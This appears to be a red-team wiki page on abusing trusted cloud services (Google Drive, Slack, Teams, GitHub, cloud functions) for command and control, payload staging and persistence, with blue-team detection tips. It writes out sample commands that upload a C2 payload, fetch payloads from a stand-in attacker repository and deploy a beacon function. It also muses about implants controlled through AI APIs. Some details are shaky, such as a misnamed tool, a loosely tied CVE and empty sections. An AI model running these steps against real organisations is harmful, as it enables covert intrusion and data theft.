Living Off the Cloud: Abusing Cloud Services for Red Teaming

Introduction: Blending into the Digital Skyline

Cyber threats today no longer rely on flashy malware or sketchy infrastructure. Modern adversaries especially Advanced Persistent Threats (APTs) are turning to trusted cloud services to operate invisibly. This technique is called Living Off The Cloud (LOTC). and it’s rapidly becoming a staple of Red Team and nation-state toolkits.

Just like Living Off the Land (LOTL) involves using native OS tools, LOTC uses cloud-based infrastructure you probably already trust.

Why it Works

Cloud services are:

Widely used and trusted: Firewalls and proxies often allow their traffic.
Encrypted by default: Most use HTTPs, making inspection harder.
Hard to blacklist: You can’t just block Google or Microsoft in most organizations.
Globally available: Attackers don’t need infrastructure, just an account.

Red Teaming Use Cases

Command and Control via Google Drive or Dropbox

TTP Flow:

Attacker drops payloads into shared cloud folder.
Infected host polls folder every 30s via scheduled task or beacon.
Exfiltrated data (e.g., screenshots, keystrokes) uploaded as new files.

Tools:

Silver + Google Drive API
gdrive: CLI for file uploads/downloads

gdrive upload C2_payload.exe
gdrive download --path /tmp tasking.json

Why it works: Google Drive traffic blends in with normal productivity behavior.

Slack or Microsoft Teams as C2 Channels

TTP Flow:

Slack bot posts commands in a private channel.
Compromised endpoints polls the channel and executes.
Output posted back as messages.

Abuse Example:

Slack webhook: https://hooks.slack.com/services/XXXX/YYYY/ZZZZ

GitHub PoC:

slack-shell
TeamC2 abusing Microsoft Teams (CVE-2023–23397 related abuse scenario)

Reference:

APT29 allegedly used Microsoft Teams to deliver malware-laced documents via chat in a 2023 attack

Bonus: Many orgs run Slack in-browser or as a native app again, trusted traffic.

Payload Hosting via GitHub Repositories

GitHub repositories (public or private) can host:

Encrypted payloads or scripts
Infrastructure-as-code (IaC) templates for dynamic infrastructure.
Configuration files used by implants
HTTPS and CDN delivery

Tool Example:

gitC2: C2 over GitHub repos.

git clone https://github.com/attacker/payloads.git

gpg --decrypt payload.bin.gpg

Persistence via Cloud Functions

Cloud functions allow event-driven execution in the cloud. Perfect for stealthy persistence.

Platforms:

AWS Lambda
Google Cloud Functions
Azure Functions

Red Team Use:

Trigger C2 beacon on HTTP request
Inject shellcode into warm function containers
Auto-deploy second-stage payloads

gcloud functions deploy beacon --runtime python39 --trigger-http

Blue Teams: Defending Against LOTC

Defending against LOTC is challenging, but not impossible. Here’s what Blue Teams and defenders should be doing:

Monitor for Anomalous Cloud Services

OAuth token abuse: Unknown apps with high permissions
Personal cloud storage: Used from corporate devices
API usage spikes: Especially to Slack, GitHub, Dropbox

Inspect DNS and HTTPs Metadata

Even if payloads are encrypted, patterns like:

Repeated traffic to non-standard subdomains
Odd timing patterns (e.g., beaconing every 30s)
Known cloud URLs used in unusual ways

Logs Everything You Can

Enable audit logs on cloud platforms (e.g., Google Workspace, M365)
Monitor file sharing activity and access patterns.
Look for out-of-place automation, like rogue bots, unknown Lambda functions, GitHub webhook abuses.

Analyze DNS + HTTPS Metadata

Even if payloads are encrypted, behaviours reveal intent:

CVEs, Zero-days, and weaknesses Enabling LOTC

Future of LOTC: AI-Enhaned Attacks?

with the rise of GenAI and Cloud, imagine:

GPT-generated phishing via Microsoft 365
Dynamic payload generation hosted on GitHub Actions
AI-controlled implants communicating via AI API (e.g., OpenAI, Anthropic)

Try it Yourself

Simulated Red Team scenario using cloud-based C2

Check out:

Mythic C2 Framework:

GitHub - its-a-feature/Mythic: A collaborative, multi-platform, red teaming frameworkGitHub

Silver C2:

GitHub - BishopFox/sliver: Adversary Emulation FrameworkGitHub

Red Canary’s Atomic Red Team Cloud TTPs:

GitHub - redcanaryco/atomic-red-team: Small and highly portable detection tests based on MITRE's ATT&CK.GitHub

PreviousInitial Access via Microsoft Teams External Tenants NextUltimate Technical Breakdown of the MITRE Ecosystem

Last updated 6 months ago

Good evening

hashtagIntroduction: Blending into the Digital Skyline

hashtagWhy it Works

hashtagRed Teaming Use Cases

hashtagCommand and Control via Google Drive or Dropbox

hashtagTTP Flow:

hashtagTools:

hashtagSlack or Microsoft Teams as C2 Channels

hashtagPayload Hosting via GitHub Repositories

hashtagPersistence via Cloud Functions

hashtagBlue Teams: Defending Against LOTC

hashtagMonitor for Anomalous Cloud Services

hashtagInspect DNS and HTTPs Metadata

hashtagLogs Everything You Can

hashtagAnalyze DNS + HTTPS Metadata

hashtagCVEs, Zero-days, and weaknesses Enabling LOTC

hashtagFuture of LOTC: AI-Enhaned Attacks?

hashtagTry it Yourself

Introduction: Blending into the Digital Skyline

Why it Works

Red Teaming Use Cases

Command and Control via Google Drive or Dropbox

TTP Flow:

Tools:

Slack or Microsoft Teams as C2 Channels

Payload Hosting via GitHub Repositories

Persistence via Cloud Functions

Blue Teams: Defending Against LOTC

Monitor for Anomalous Cloud Services

Inspect DNS and HTTPs Metadata

Logs Everything You Can

Analyze DNS + HTTPS Metadata

CVEs, Zero-days, and weaknesses Enabling LOTC

Future of LOTC: AI-Enhaned Attacks?

Try it Yourself